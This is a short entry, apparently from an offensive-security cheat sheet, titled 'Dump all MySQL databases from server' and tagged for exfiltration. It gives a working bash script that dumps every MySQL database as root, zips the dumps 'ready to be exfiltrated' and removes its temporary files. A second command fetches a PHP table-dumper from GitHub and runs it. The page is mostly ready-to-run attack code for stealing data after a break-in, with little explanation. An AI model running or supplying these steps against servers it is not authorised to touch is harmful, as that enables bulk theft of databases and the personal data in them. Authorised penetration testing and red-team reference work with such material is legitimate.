title = "Dump all MySQL databases from server"
description = ""
tags = ["MySQL", "web", "exfiltration"]
source = [""]

[[data]]
description = "Bash script. Change user and password and run it. Databases will be zipped to dumps.zip, ready to be exfiltrated."
language = "bash"
command = """#!/bin/bash

USER="root"
PASS="password"

databases=`mysql -u $USER -p$PASS -e "SHOW DATABASES;" | tr -d "| " | grep -v Database`

path=$(mktemp -d)

for db in $databases; do
    echo "Dumping db: $db"
    mysqldump -u $USER -p$PASS --databases $db > ${path}/`date +%Y%m%d`"_$db.sql"
done

zip -r dumps.zip ${path}/*.sql

rm -fr $path

echo 'Saved dumps at dumps.zip'"""

[[data]]
description = "PHP Script. Change host, username, password and database name and run it. It will dump all tables and create csv files for each table. Additionally you can zip the folder"
language = "bash"
command = """
wget https://raw.githubusercontent.com/pedroferreiraa/DatabaseTableDumper/main/dump.php

# Running script

php dump.php --help
"""
